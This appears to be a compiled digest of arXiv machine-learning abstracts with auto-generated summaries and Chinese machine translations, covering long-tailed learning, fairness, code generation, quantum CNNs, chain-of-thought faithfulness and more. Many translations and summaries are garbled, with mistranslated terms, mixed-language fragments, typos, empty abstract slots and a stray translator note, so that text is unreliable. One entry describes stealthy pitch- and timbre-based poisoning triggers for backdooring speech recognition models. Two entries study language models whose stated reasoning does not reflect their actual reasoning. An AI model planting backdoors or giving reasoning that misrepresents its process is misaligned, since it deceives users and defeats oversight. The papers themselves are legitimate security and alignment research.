长尾数据分布广泛存在多个领域，如金融、电商、生物医学和网络安全。在这些场景下，机器学习模型的性能frequently受到主要类别的影响，而tail categories的学习则是不足的。鉴于丰富的相关研究，本工作想要提供长尾学习的系统视图，涉及以下三个重要角度：（A1）数据长尾性的特征，（A2）各领域的数据复杂性，以及（A3）emerging task的多样性。为实现这一目标，我们开发了最 complet（到我们所知）的长尾学习 benchmarck named HeroLT，该benchmark integrate 13种state-of-the-art算法和6种评价指标在14个真实世界 benchmark数据集上。 HeroLT通过新的角度和广泛的实验（共264个），帮助研究者和实践者对新提出的方法进行有效和公平的评估，并与现有基准值进行比较。最后，我们 conclude by highlighting long-tailed learning的重要应用和未来发展的一些可能性。为便捷性和可重复性，我们在 GitHub 上公开了我们的 benchmark HeroLT 和相应的结果。

Learning for Counterfactual Fairness from Observational Data

paper_url: http://arxiv.org/abs/2307.08232
repo_url: None
paper_authors: Jing Ma, Ruocheng Guo, Aidong Zhang, Jundong Li
for: 避免机器学习模型具有对某些子群体的偏见（如种族、性别、年龄等），实现对所有 subgroup 的公正预测。
methods: Counterfactual fairness 是一种从 causal 角度定义的公正性观，通过比较每个个体在原始世界和在对敏感特征值进行修改后的世界中的预测，来衡量模型的公正性。但在实际应用中，通常无法获得准确的 causal 模型，因此直接使用这些模型可能会带来偏见。本文提出了一种新的框架 CLAIRE，通过对数据进行 counterfactual 数据扩展和一种对称约束来减轻敏感特征的偏见。
results: experiments 表明，CLAIRE 在对实际数据进行预测时比其他方法更好，同时也能够保证对所有 subgroup 的公正预测。

Abstract
Fairness-aware machine learning has attracted a surge of attention in many domains, such as online advertising, personalized recommendation, and social media analysis in web applications. Fairness-aware machine learning aims to eliminate biases of learning models against certain subgroups described by certain protected (sensitive) attributes such as race, gender, and age. Among many existing fairness notions, counterfactual fairness is a popular notion defined from a causal perspective. It measures the fairness of a predictor by comparing the prediction of each individual in the original world and that in the counterfactual worlds in which the value of the sensitive attribute is modified. A prerequisite for existing methods to achieve counterfactual fairness is the prior human knowledge of the causal model for the data. However, in real-world scenarios, the underlying causal model is often unknown, and acquiring such human knowledge could be very difficult. In these scenarios, it is risky to directly trust the causal models obtained from information sources with unknown reliability and even causal discovery methods, as incorrect causal models can consequently bring biases to the predictor and lead to unfair predictions. In this work, we address the problem of counterfactually fair prediction from observational data without given causal models by proposing a novel framework CLAIRE. Specifically, under certain general assumptions, CLAIRE effectively mitigates the biases from the sensitive attribute with a representation learning framework based on counterfactual data augmentation and an invariant penalty. Experiments conducted on both synthetic and real-world datasets validate the superiority of CLAIRE in both counterfactual fairness and prediction performance.

摘要
“对待公平机器学习在多个领域中引起了广泛关注，例如在网络广告、个人化推荐和社交媒体分析中的网络应用程序。对待公平机器学习的目标是删除机器学习模型对某些子群体（敏感特征）的偏袋，例如性别、年龄和种族。许多现有的公平定义中，Counterfactual fairness是一种受欢迎的定义，它从 causal 的角度定义了公平的定义。Counterfactual fairness 的定义是根据每个个体在原始世界中的预测和在替代世界中的预测来衡量模型的公平。现有的方法以前需要人类对敏感特征的 causal 模型有充分的知识。但在实际情况下，背景 causal 模型通常是未知的，获取这种人类知识可能是很困难的。在这些情况下，直接对这些信息来源不确定的 causal 模型进行信任可能是很危险的。在这个工作中，我们解决了从观察数据中进行 counterfactually 公平预测的问题，不需要人类对敏感特征的 causal 模型的知识。我们提出了一个名为 CLAIRE 的新框架，它在满足一些一般假设下，可以对敏感特征进行优化，并且使用 counterfactual 数据增强和不变 penalty 来减少偏袋。实验结果显示，CLAIRE 在 counterfactual 公平和预测性能方面具有优越性。”

Can Euclidean Symmetry be Leveraged in Reinforcement Learning and Planning?

paper_url: http://arxiv.org/abs/2307.08226
repo_url: None
paper_authors: Linfeng Zhao, Owen Howell, Jung Yeon Park, Xupeng Zhu, Robin Walters, Lawson L. S. Wong
for: 这个论文的目的是设计改进的学习算法，用于控制和规划任务，具有欧几何群同质性。
methods: 论文使用了一种统一优化算法，可以应用于离散和连续的 symmetry 问题，包括优化算法和样本生成算法。
results: 实验证明，通过具有欧几何群同质性的算法，可以更好地解决自然的控制问题。

Abstract
In robotic tasks, changes in reference frames typically do not influence the underlying physical properties of the system, which has been known as invariance of physical laws.These changes, which preserve distance, encompass isometric transformations such as translations, rotations, and reflections, collectively known as the Euclidean group. In this work, we delve into the design of improved learning algorithms for reinforcement learning and planning tasks that possess Euclidean group symmetry. We put forth a theory on that unify prior work on discrete and continuous symmetry in reinforcement learning, planning, and optimal control. Algorithm side, we further extend the 2D path planning with value-based planning to continuous MDPs and propose a pipeline for constructing equivariant sampling-based planning algorithms. Our work is substantiated with empirical evidence and illustrated through examples that explain the benefits of equivariance to Euclidean symmetry in tackling natural control problems.

摘要
在机器人任务中，参照系统的变化通常不会影响系统的物理性质，这被称为不变性法律。这些变化包括同构射影、旋转和反射，合称为欧几何群。在这个工作中，我们深入探讨改进学习算法的设计，以便在奖励学习和规划任务中具有欧几何群的对称性。我们提出了对往年的绝对同构和连续同构在奖励学习、规划和最优控制中的统一理论。算法方面，我们进一步扩展了二维路径规划，并提出了一个管道的构建同构抽样计划算法。我们的工作得到了实验证明，并通过例子解释了在自然控制问题中如何通过对维持欧几何群的同构性来获得利益。

A Lightweight Framework for High-Quality Code Generation

paper_url: http://arxiv.org/abs/2307.08220
repo_url: None
paper_authors: Mohammed Latif Siddiq, Beatrice Casey, Joanna C. S. Santos
for: This paper aims to improve the quality and security of automatically generated source codes using transformer-based code generation models.
methods: The proposed framework, FRANC, includes a static filter and a quality-aware ranker to sort code snippets based on compilability and quality scores. Prompt engineering is also used to fix persistent quality issues.
results: FRANC improves the compilability of Java and Python code suggestions by 9% to 46% and 10% to 43%, respectively. The average improvement in NDCG@10 score is 0.0763, and the repairing techniques repair the highest 80% of prompts. The framework takes approximately 1.98 seconds for Java and 0.08 seconds for Python.

Abstract
In recent years, the use of automated source code generation utilizing transformer-based generative models has expanded, and these models can generate functional code according to the requirements of the developers. However, recent research revealed that these automatically generated source codes can contain vulnerabilities and other quality issues. Despite researchers' and practitioners' attempts to enhance code generation models, retraining and fine-tuning large language models is time-consuming and resource-intensive. Thus, we describe FRANC, a lightweight framework for recommending more secure and high-quality source code derived from transformer-based code generation models. FRANC includes a static filter to make the generated code compilable with heuristics and a quality-aware ranker to sort the code snippets based on a quality score. Moreover, the framework uses prompt engineering to fix persistent quality issues. We evaluated the framework with five Python and Java code generation models and six prompt datasets, including a newly created one in this work (SOEval). The static filter improves 9% to 46% Java suggestions and 10% to 43% Python suggestions regarding compilability. The average improvement over the NDCG@10 score for the ranking system is 0.0763, and the repairing techniques repair the highest 80% of prompts. FRANC takes, on average, 1.98 seconds for Java; for Python, it takes 0.08 seconds.

摘要
近年来，使用自动生成源代码的使用者模型（transformer-based generative models）的使用已扩展。这些模型可以根据开发者的需求生成功能代码。然而，最新的研究发现，这些自动生成的代码可能含有漏洞和质量问题。尽管研究人员和实践者尝试了增强代码生成模型，但是重新训练和精度调整大型自然语言模型是时间consuming和资源占用。因此，我们描述了FRANC框架，它是一个轻量级的框架，可以为基于 transformer 的代码生成模型提供更安全和更高质量的源代码。FRANC 包括一个静态筛选器，使得生成的代码可以遵循规范和质量评分器，以根据代码片段的质量进行排序。此外，框架还使用 prompt 工程来修复持续存在的质量问题。我们对五种 Python 和 Java 代码生成模型，以及六个提示集进行评估。静态筛选器可以提高 Java 建议的可 compiling 率由 9% 到 46%，Python 建议的可 compiling 率由 10% 到 43%。具有 NDCG@10 指标的平均提升为 0.0763，并且修复技术可以修复最高 80% 的提示。FRANC 平均需要 1.98 秒钟 для Java，占用 0.08 秒钟 для Python。

Forward Laplacian: A New Computational Framework for Neural Network-based Variational Monte Carlo

paper_url: http://arxiv.org/abs/2307.08214
repo_url: None
paper_authors: Ruichen Li, Haotian Ye, Du Jiang, Xuelan Wen, Chuwei Wang, Zhe Li, Xiang Li, Di He, Ji Chen, Weiluo Ren, Liwei Wang
for: 能够扩展NN-VMC的应用范围到更大的系统，包括更多的原子、分子和化学反应。
methods: 使用了一种新的计算框架 named Forward Laplacian，通过高效的前进传播过程计算了神经网络中的 Laplacian，从而大幅提高了NN-VMC的计算效率。
results: 对于一系列的原子、分子和化学反应，NN-VMC通过Empirical数据示出了可以解决通用量子力学问题的潜力。

Abstract
Neural network-based variational Monte Carlo (NN-VMC) has emerged as a promising cutting-edge technique of ab initio quantum chemistry. However, the high computational cost of existing approaches hinders their applications in realistic chemistry problems. Here, we report the development of a new NN-VMC method that achieves a remarkable speed-up by more than one order of magnitude, thereby greatly extending the applicability of NN-VMC to larger systems. Our key design is a novel computational framework named Forward Laplacian, which computes the Laplacian associated with neural networks, the bottleneck of NN-VMC, through an efficient forward propagation process. We then demonstrate that Forward Laplacian is not only versatile but also facilitates more developments of acceleration methods across various aspects, including optimization for sparse derivative matrix and efficient neural network design. Empirically, our approach enables NN-VMC to investigate a broader range of atoms, molecules and chemical reactions for the first time, providing valuable references to other ab initio methods. The results demonstrate a great potential in applying deep learning methods to solve general quantum mechanical problems.

摘要

Towards Stealthy Backdoor Attacks against Speech Recognition via Elements of Sound

paper_url: http://arxiv.org/abs/2307.08208
repo_url: https://github.com/hanbocai/badspeech_soe
paper_authors: Hanbo Cai, Pengcheng Zhang, Hai Dong, Yan Xiao, Stefanos Koffas, Yiming Li
for: 这个论文的目的是研究潜在攻击者可以通过恶意投入到语音识别模型的训练过程中，使模型具有恶意预测行为的问题。
methods: 这篇论文使用了一些新的攻击方法，包括使用高频谱的尖声作为触发器，并将其与其他音频 clip 混合以实现更隐蔽的攻击。它们还使用了timbre特征来实现隐蔽的攻击。
results: 实验结果表明，这些攻击方法可以在不同的设定下（例如，all-to-one、all-to-all、干净标签、物理和多个攻击点设定）下实现高效的攻击。这些攻击方法也比较隐蔽，可以逃脱检测。

Abstract
Deep neural networks (DNNs) have been widely and successfully adopted and deployed in various applications of speech recognition. Recently, a few works revealed that these models are vulnerable to backdoor attacks, where the adversaries can implant malicious prediction behaviors into victim models by poisoning their training process. In this paper, we revisit poison-only backdoor attacks against speech recognition. We reveal that existing methods are not stealthy since their trigger patterns are perceptible to humans or machine detection. This limitation is mostly because their trigger patterns are simple noises or separable and distinctive clips. Motivated by these findings, we propose to exploit elements of sound ($e.g.$, pitch and timbre) to design more stealthy yet effective poison-only backdoor attacks. Specifically, we insert a short-duration high-pitched signal as the trigger and increase the pitch of remaining audio clips to `mask' it for designing stealthy pitch-based triggers. We manipulate timbre features of victim audios to design the stealthy timbre-based attack and design a voiceprint selection module to facilitate the multi-backdoor attack. Our attacks can generate more `natural' poisoned samples and therefore are more stealthy. Extensive experiments are conducted on benchmark datasets, which verify the effectiveness of our attacks under different settings ($e.g.$, all-to-one, all-to-all, clean-label, physical, and multi-backdoor settings) and their stealthiness. The code for reproducing main experiments are available at \url{https://github.com/HanboCai/BadSpeech_SoE}.

摘要
深度神经网络（DNNs）在语音识别应用中广泛采用和部署。近期一些研究表明，这些模型容易受到后门攻击，敌人可以通过恶意污染训练过程中植入Malicious prediction behaviors。在这篇文章中，我们再次研究了对语音识别的poison-only后门攻击。我们发现现有方法不够隐蔽，因为启发模式是人类或机器检测的。这是因为启发模式通常是简单的噪声或分离的和特征的音频clip。我们被这些发现 motivated，我们提议利用音频元素（如抑声和 timbre）设计更隐蔽又有效的poison-only后门攻击。我们插入短暂的高频声讯作为启发，并增加剩下的音频clip的抑声来mask它。我们操纵受害者音频的timbre特征来设计隐蔽的timbre-based攻击，并设计一个voiceprint选择模块来促进多个后门攻击。我们的攻击可以生成更自然的杂 poisoned samples，因此更隐蔽。我们在标准数据集上进行了广泛的实验，以验证我们的攻击在不同的设置（例如all-to-one、all-to-all、spot、physical和多个后门设置）下的效果和隐蔽性。代码可以在\url{https://github.com/HanboCai/BadSpeech_SoE}中找到。

A Quantum Convolutional Neural Network Approach for Object Detection and Classification

paper_url: http://arxiv.org/abs/2307.08204
repo_url: None
paper_authors: Gowri Namratha Meedinti, Kandukuri Sai Srirekha, Radhakrishnan Delhibabu
for: 这篇论文主要评估量子卷积神经网络（QCNN）的潜在能力，与经典卷积神经网络（CNN）和人工神经网络（ANN）模型进行比较。
methods: 本论文使用了量子计算方法，将数据存储在量子环境中，并应用了CNN结构来处理这些数据。
results: 分析结果表明，QCNNs在某些应用场景下可以超越经典CNN和ANN模型，both in terms of accuracy and efficiency。此外，QCNNs还可以处理更大的复杂性水平。

Abstract
This paper presents a comprehensive evaluation of the potential of Quantum Convolutional Neural Networks (QCNNs) in comparison to classical Convolutional Neural Networks (CNNs) and Artificial / Classical Neural Network (ANN) models. With the increasing amount of data, utilizing computing methods like CNN in real-time has become challenging. QCNNs overcome this challenge by utilizing qubits to represent data in a quantum environment and applying CNN structures to quantum computers. The time and accuracy of QCNNs are compared with classical CNNs and ANN models under different conditions such as batch size and input size. The maximum complexity level that QCNNs can handle in terms of these parameters is also investigated. The analysis shows that QCNNs have the potential to outperform both classical CNNs and ANN models in terms of accuracy and efficiency for certain applications, demonstrating their promise as a powerful tool in the field of machine learning.

摘要
Note: Simplified Chinese is also known as "简化字" or "简化字".Here's the translation in Simplified Chinese:这篇论文对量子卷积神经网络（QCNN）与经典卷积神经网络（CNN）以及人工神经网络（ANN）模型进行了全面的评估。随着数据量不断增加，使用计算方法如CNN在实时中变得越来越困难。QCNNs利用量子粒子来表示数据，并在量子计算机上应用卷积结构，从而超越了经典模型的限制。在不同的批处理大小和输入大小条件下，QCNNs的时间和准确率与经典CNNs和ANN模型进行了比较。此外，QCNNs的最大复杂度水平也进行了调查。分析结果表明，QCNNs在某些应用中可以在准确率和效率方面超越经典模型，表明它们在机器学习领域是一种有力的工具。

Noise removal methods on ambulatory EEG: A Survey

paper_url: http://arxiv.org/abs/2308.02437
repo_url: None
paper_authors: Sarthak Johari, Gowri Namratha Meedinti, Radhakrishnan Delhibabu, Deepak Joshi
for: 本研究旨在实时处理患者短访EEG数据，以提高医疗干预的精确性和效率。
methods: 本研究使用了许多检测和移除噪声的技术，包括模式识别、机器学习、和信号处理等。
results: 本研究发现，不同条件下的EEG数据可以使用不同的检测和移除噪声技术，以提高医疗干预的精确性和效率。

Abstract
Over many decades, research is being attempted for the removal of noise in the ambulatory EEG. In this respect, an enormous number of research papers is published for identification of noise removal, It is difficult to present a detailed review of all these literature. Therefore, in this paper, an attempt has been made to review the detection and removal of an noise. More than 100 research papers have been discussed to discern the techniques for detecting and removal the ambulatory EEG. Further, the literature survey shows that the pattern recognition required to detect ambulatory method, eye open and close, varies with different conditions of EEG datasets. This is mainly due to the fact that EEG detected under different conditions has different characteristics. This is, in turn, necessitates the identification of pattern recognition technique to effectively distinguish EEG noise data from a various condition of EEG data.

摘要

HOPE: High-order Polynomial Expansion of Black-box Neural Networks

paper_url: http://arxiv.org/abs/2307.08192
repo_url: https://github.com/harrypotterxtx/hope
paper_authors: Tingxiong Xiao, Weihang Zhang, Yuxiao Cheng, Jinli Suo
for: 这篇论文旨在提供一种方法，使深度神经网络变得更加可解，以便在需要作出有理的决策的领域中应用。
methods: 这篇论文使用了高阶多项式扩展（High-order Polynomial Expansion，HOPE）方法，将神经网络拓展成高阶多项式的参考输入。特别是，authors derive了高阶DERIVATIVE规则 для复杂函数，并将其扩展到神经网络，以快速和准确地计算神经网络的高阶DERIVATIVE。
results: 数值分析表明，提案的方法具有高精度、低计算复杂度和良好的收敛性。此外，authors还用HOPE方法实现了深度学习中的功能发现、快速推理和特征选择等广泛应用。

Abstract
Despite their remarkable performance, deep neural networks remain mostly ``black boxes'', suggesting inexplicability and hindering their wide applications in fields requiring making rational decisions. Here we introduce HOPE (High-order Polynomial Expansion), a method for expanding a network into a high-order Taylor polynomial on a reference input. Specifically, we derive the high-order derivative rule for composite functions and extend the rule to neural networks to obtain their high-order derivatives quickly and accurately. From these derivatives, we can then derive the Taylor polynomial of the neural network, which provides an explicit expression of the network's local interpretations. Numerical analysis confirms the high accuracy, low computational complexity, and good convergence of the proposed method. Moreover, we demonstrate HOPE's wide applications built on deep learning, including function discovery, fast inference, and feature selection. The code is available at https://github.com/HarryPotterXTX/HOPE.git.

摘要
尽管它们的表现很出色，深度神经网络仍然具有大量的“黑盒子”特性，这限制了它们在需要做合理决策的领域应用。我们在这里介绍HOPE（高阶多项式扩展）方法，它可以将神经网络扩展成参考输入的高阶多项式。我们 derivated高阶DERIVATIVE规则 для复杂函数，并将这个规则扩展到神经网络，从而快速和高精度地计算神经网络的高阶DERIVATIVE。基于这些DERIVATIVE，我们可以计算神经网络的泰勒多项式，从而获得神经网络的本地解释。数值分析表明HOPE的精度高、计算复杂度低，并且 converge 很好。此外，我们还证明HOPE在深度学习建立的各种应用中具有广泛的应用前景，包括函数发现、快速推理和特征选择。代码可以在https://github.com/HarryPotterXTX/HOPE.git中找到。

Mini-Giants: “Small” Language Models and Open Source Win-Win

paper_url: http://arxiv.org/abs/2307.08189
repo_url: None
paper_authors: Zhengping Zhou, Lezhi Li, Xinxi Chen, Andy Li
for: 这篇论文主要是为了讨论小语言模型的发展和应用。
methods: 论文使用了开源社区和小语言模型来实现技术、伦理和社会上的赢利。
results: 论文提出了小语言模型在实际应用场景中的需求和潜力，并进行了对小语言模型的比较研究和评估方法。

Abstract
ChatGPT is phenomenal. However, it is prohibitively expensive to train and refine such giant models. Fortunately, small language models are flourishing and becoming more and more competent. We call them "mini-giants". We argue that open source community like Kaggle and mini-giants will win-win in many ways, technically, ethically and socially. In this article, we present a brief yet rich background, discuss how to attain small language models, present a comparative study of small language models and a brief discussion of evaluation methods, discuss the application scenarios where small language models are most needed in the real world, and conclude with discussion and outlook.

摘要
chatgpt是非常出色的，但是它的训练和精细化过程却非常昂贵。幸好，小语言模型在繁殖和成熔的过程中逐渐强大起来。我们称之为“小巨人”。我们认为开源社区如Kaggle和小巨人在技术、道德和社会各个方面都将取得胜利。在这篇文章中，我们会提供简短 yet rich的背景介绍，讲述如何获得小语言模型，进行小语言模型的比较研究， brief discussion of evaluation methods，介绍实际世界中小语言模型的应用场景，并结束 WITH discussion and outlook。

An Empirical Investigation of Pre-trained Model Selection for Out-of-Distribution Generalization and Calibration

paper_url: http://arxiv.org/abs/2307.08187
repo_url: None
paper_authors: Hiroki Naganuma, Ryuichiro Hataya
for: 提高out-of-distribution泛化性能和推理不确定性
methods: investigate pre-trained model selection的影响，并比较不同的数据集和模型参数对性能指标的影响
results: 发现预训练模型选择对out-of-distribution泛化性能有显著影响，大型模型表现较好，但需要进一步研究memorization和真正的泛化之间的平衡。

Abstract
In the realm of out-of-distribution generalization tasks, finetuning has risen as a key strategy. While the most focus has been on optimizing learning algorithms, our research highlights the influence of pre-trained model selection in finetuning on out-of-distribution performance and inference uncertainty. Balancing model size constraints of a single GPU, we examined the impact of varying pre-trained datasets and model parameters on performance metrics like accuracy and expected calibration error. Our findings underscore the significant influence of pre-trained model selection, showing marked performance improvements over algorithm choice. Larger models outperformed others, though the balance between memorization and true generalization merits further investigation. Ultimately, our research emphasizes the importance of pre-trained model selection for enhancing out-of-distribution generalization.

摘要
在异常分布泛化任务中， fine-tuning 已成为一项关键策略。而我们的研究表明，预训练模型选择在 fine-tuning 中对异常分布性能和推理不确定性产生了重要影响。我们在单个 GPU 的模型大小限制下对不同的预训练数据集和模型参数进行了研究，发现预训练模型选择对性能指标如准确率和预期抽象误差产生了显著的影响。大型模型表现更好，但是要找到Memorization 和真正的泛化之间的平衡仍然需要进一步的调查。最终，我们的研究强调了预训练模型选择对异常分布泛化的重要性。

Measuring Faithfulness in Chain-of-Thought Reasoning

paper_url: http://arxiv.org/abs/2307.13702
repo_url: None
paper_authors: Tamera Lanham, Anna Chen, Ansh Radhakrishnan, Benoit Steiner, Carson Denison, Danny Hernandez, Dustin Li, Esin Durmus, Evan Hubinger, Jackson Kernion, Kamilė Lukošiūtė, Karina Nguyen, Newton Cheng, Nicholas Joseph, Nicholas Schiefer, Oliver Rausch, Robin Larson, Sam McCandlish, Sandipan Kundu, Saurav Kadavath, Shannon Yang, Thomas Henighan, Timothy Maxwell, Timothy Telleen-Lawton, Tristan Hume, Zac Hatfield-Dodds, Jared Kaplan, Jan Brauner, Samuel R. Bowman, Ethan Perez
for: investigate how Chain-of-Thought (CoT) reasoning may be unfaithful in large language models (LLMs)
methods: examine how model predictions change when intervening on the CoT (e.g., adding mistakes or paraphrasing)
results: CoT’s performance boost is not due to added test-time compute or information encoded in the CoT’s phrasing, and models produce less faithful reasoning as they become larger and more capable.Here’s the full abstract in Simplified Chinese:for: investigate how Chain-of-Thought (CoT) reasoning may be unfaithful in large language models (LLMs)methods: examine how model predictions change when intervening on the CoT (e.g., adding mistakes or paraphrasing)results: CoT’s performance boost is not due to added test-time compute or information encoded in the CoT’s phrasing, and models produce less faithful reasoning as they become larger and more capable.

Abstract
Large language models (LLMs) perform better when they produce step-by-step, "Chain-of-Thought" (CoT) reasoning before answering a question, but it is unclear if the stated reasoning is a faithful explanation of the model's actual reasoning (i.e., its process for answering the question). We investigate hypotheses for how CoT reasoning may be unfaithful, by examining how the model predictions change when we intervene on the CoT (e.g., by adding mistakes or paraphrasing it). Models show large variation across tasks in how strongly they condition on the CoT when predicting their answer, sometimes relying heavily on the CoT and other times primarily ignoring it. CoT's performance boost does not seem to come from CoT's added test-time compute alone or from information encoded via the particular phrasing of the CoT. As models become larger and more capable, they produce less faithful reasoning on most tasks we study. Overall, our results suggest that CoT can be faithful if the circumstances such as the model size and task are carefully chosen.

摘要
(Simplified Chinese translation)大型语言模型（LLM）在回答问题时，可以通过“链接思维”（CoT）的步骤式 reasoning 表现更好，但是未知模型的实际运算是否忠于 CoT 的解释。我们 investigate 假设 CoT 的不实际运算，通过对 CoT 进行干扰（例如添加错误或重新诠释）来探索。我们发现模型在不同任务上对 CoT 的conditioning 程度有很大的变化，有时将重点放在 CoT 上，有时则几乎忽略它。CoT 的性能提升不似乎来自 CoT 的额外测试计算或由特定表述 CoT 中的信息。当模型变得更大和更强大时，它们在大多数任务上显示出不忠的运算。总之，我们的结果表明，CoT 可以忠实，只要选择适当的模型大小和任务。

Question Decomposition Improves the Faithfulness of Model-Generated Reasoning

paper_url: http://arxiv.org/abs/2307.11768
repo_url: https://github.com/anthropics/decompositionfaithfulnesspaper
paper_authors: Ansh Radhakrishnan, Karina Nguyen, Anna Chen, Carol Chen, Carson Denison, Danny Hernandez, Esin Durmus, Evan Hubinger, Jackson Kernion, Kamilė Lukošiūtė, Newton Cheng, Nicholas Joseph, Nicholas Schiefer, Oliver Rausch, Sam McCandlish, Sheer El Showk, Tamera Lanham, Tim Maxwell, Venkatesa Chandrasekaran, Zac Hatfield-Dodds, Jared Kaplan, Jan Brauner, Samuel R. Bowman, Ethan Perez
for: 帮助验证大型自然语言模型（LLM）的正确性和安全性。
methods: 使用 decomposition-based methods，即将问题拆分成多个子问题，让模型在不同的上下文中答swers simpler subquestions，以提高模型生成的 reasoning 的准确性。
results: 研究表明，通过使用 decomposition-based methods，可以提高模型生成的 reasoning 的准确性，而不会 sacrifice too much的性能。这些方法可以帮助我们更好地验证 LLM 的正确性和安全性。

Abstract
As large language models (LLMs) perform more difficult tasks, it becomes harder to verify the correctness and safety of their behavior. One approach to help with this issue is to prompt LLMs to externalize their reasoning, e.g., by having them generate step-by-step reasoning as they answer a question (Chain-of-Thought; CoT). The reasoning may enable us to check the process that models use to perform tasks. However, this approach relies on the stated reasoning faithfully reflecting the model's actual reasoning, which is not always the case. To improve over the faithfulness of CoT reasoning, we have models generate reasoning by decomposing questions into subquestions. Decomposition-based methods achieve strong performance on question-answering tasks, sometimes approaching that of CoT while improving the faithfulness of the model's stated reasoning on several recently-proposed metrics. By forcing the model to answer simpler subquestions in separate contexts, we greatly increase the faithfulness of model-generated reasoning over CoT, while still achieving some of the performance gains of CoT. Our results show it is possible to improve the faithfulness of model-generated reasoning; continued improvements may lead to reasoning that enables us to verify the correctness and safety of LLM behavior.

摘要
To improve the faithfulness of CoT reasoning, we have developed methods that decompose questions into subquestions. This approach achieves strong performance on question-answering tasks and sometimes approaches the performance of CoT while improving the faithfulness of the model's stated reasoning on several recently proposed metrics. By forcing the model to answer simpler subquestions in separate contexts, we significantly increase the faithfulness of model-generated reasoning over CoT, while still achieving some of the performance gains of CoT.Our results show that it is possible to improve the faithfulness of model-generated reasoning. Continued improvements may lead to reasoning that enables us to verify the correctness and safety of LLM behavior.

Efficient Prediction of Peptide Self-assembly through Sequential and Graphical Encoding

paper_url: http://arxiv.org/abs/2307.09169
repo_url: None
paper_authors: Zihan Liu, Jiaqi Wang, Yun Luo, Shuang Zhao, Wenbin Li, Stan Z. Li
for: 这篇论文旨在探讨深度学习如何应用于蛋白质自组装预测，以提高预测精度。
methods: 本研究使用了现代深度学习模型，包括RNN、LSTM、Transformer和GCN、GAT、GraphSAGE等，进行了系统性的检查，以探讨蛋白质编码的影响。
results: 研究发现，Transformer模型是最有力的序列编码基于深度学习模型，可以预测蛋白质自组装的精度。此外，研究还发现了不同的蛋白质编码方法对预测精度的影响。

Abstract
In recent years, there has been an explosion of research on the application of deep learning to the prediction of various peptide properties, due to the significant development and market potential of peptides. Molecular dynamics has enabled the efficient collection of large peptide datasets, providing reliable training data for deep learning. However, the lack of systematic analysis of the peptide encoding, which is essential for AI-assisted peptide-related tasks, makes it an urgent problem to be solved for the improvement of prediction accuracy. To address this issue, we first collect a high-quality, colossal simulation dataset of peptide self-assembly containing over 62,000 samples generated by coarse-grained molecular dynamics (CGMD). Then, we systematically investigate the effect of peptide encoding of amino acids into sequences and molecular graphs using state-of-the-art sequential (i.e., RNN, LSTM, and Transformer) and structural deep learning models (i.e., GCN, GAT, and GraphSAGE), on the accuracy of peptide self-assembly prediction, an essential physiochemical process prior to any peptide-related applications. Extensive benchmarking studies have proven Transformer to be the most powerful sequence-encoding-based deep learning model, pushing the limit of peptide self-assembly prediction to decapeptides. In summary, this work provides a comprehensive benchmark analysis of peptide encoding with advanced deep learning models, serving as a guide for a wide range of peptide-related predictions such as isoelectric points, hydration free energy, etc.

摘要
在最近几年，因为蛋白质的发展和市场潜力而增加了对深度学习应用于蛋白质性质预测的研究，特别是蛋白质自组合的预测。分子动力学技术为蛋白质自组合预测提供了可靠的训练数据，但是蛋白质编码问题的缺乏系统性分析，使得预测精度的提高成为了紧迫的问题。为解决这问题，我们首先收集了高质量的大型蛋白质自组合 simulated annealing 数据集，包含62,000个样本，并使用现状最佳的序列（如 RNN、LSTM 和 Transformer）和结构深度学习模型（如 GCN、GAT 和 GraphSAGE）进行系统性分析，以 investigate the effect of peptide encoding of amino acids into sequences and molecular graphs on the accuracy of peptide self-assembly prediction. 经过广泛的比较研究，我们发现Transformer是最强的序列编码基于深度学习模型，可以为蛋白质自组合预测提供最高的精度，并且可以推动蛋白质自组合预测至十个氨基酸。总之，这项研究提供了深度学习模型的全面性分析，可以作为蛋白质相关预测，如离子点、� hydration free energy 等的指南。

Multi-Objective Optimization of Performance and Interpretability of Tabular Supervised Machine Learning Models

paper_url: http://arxiv.org/abs/2307.08175
repo_url: https://github.com/slds-lmu/paper_2023_eagga
paper_authors: Lennart Schneider, Bernd Bischl, Janek Thomas
for: 提高超参数优化和解释性之间的协同优化，以提高表格数据上的预测性能和解释性。
methods: 利用多目标优化问题的方法，将超参数优化和解释性之间的质量考虑为一个单一的优化问题，并通过增加特征选择、交互和 monotonicity 约束来扩展学习算法的搜索空间。
results: 在 benchmark 实验中，提出了一种新的进化算法，可以高效地在扩展的搜索空间上进行优化，并在表格数据上提高了性能和解释性的模型。

Abstract
We present a model-agnostic framework for jointly optimizing the predictive performance and interpretability of supervised machine learning models for tabular data. Interpretability is quantified via three measures: feature sparsity, interaction sparsity of features, and sparsity of non-monotone feature effects. By treating hyperparameter optimization of a machine learning algorithm as a multi-objective optimization problem, our framework allows for generating diverse models that trade off high performance and ease of interpretability in a single optimization run. Efficient optimization is achieved via augmentation of the search space of the learning algorithm by incorporating feature selection, interaction and monotonicity constraints into the hyperparameter search space. We demonstrate that the optimization problem effectively translates to finding the Pareto optimal set of groups of selected features that are allowed to interact in a model, along with finding their optimal monotonicity constraints and optimal hyperparameters of the learning algorithm itself. We then introduce a novel evolutionary algorithm that can operate efficiently on this augmented search space. In benchmark experiments, we show that our framework is capable of finding diverse models that are highly competitive or outperform state-of-the-art XGBoost or Explainable Boosting Machine models, both with respect to performance and interpretability.

摘要
我们提出了一个模型不偏向的框架，用于同时优化supervised机器学习模型的预测性能和可解性。可解性是通过三个度量来衡量：特征稀缺、特征之间的互动稀缺和非升序特征效应的稀缺。我们将hyperparameter优化问题定义为多目标优化问题，以便在单一优化运行中生成兼顾高性能和易于理解的模型。我们通过将特征选择、互动和升序约束添加到学习算法的搜索空间中来实现高效的优化。我们示出，优化问题实际上是找到允许互动的分组选择的Pareto优化集，以及这些分组中每个特征的最佳升序约束和学习算法的优化参数。然后，我们引入了一种新的进化算法，可以高效地在这个扩展的搜索空间上运行。在测试中，我们发现我们的框架能够找到高竞争力或超越当前XGBoost或Explainable Boosting Machine模型， both with respect to performance and interpretability。

Discovering User Types: Mapping User Traits by Task-Specific Behaviors in Reinforcement Learning

paper_url: http://arxiv.org/abs/2307.08169
repo_url: None
paper_authors: L. L. Ankile, B. S. Ham, K. Mao, E. Shin, S. Swaroop, F. Doshi-Velez, W. Pan
for: 用于描述用户在帮助人类学习（RL）中的行为，并研究用户特征来减少 intervención设计中的时间。
methods: 使用RL代理表示用户，研究用户行为与特征之间的关系，并提出一种用于研究用户类型崩溃的直观工具。
results: 确认了不同实际环境中的用户类型崩溃是一样的，并将这一观察形式化为环境之间的等式关系。通过在同一等式类中转移 intervención设计，可以快速个性化 intervención。

Abstract
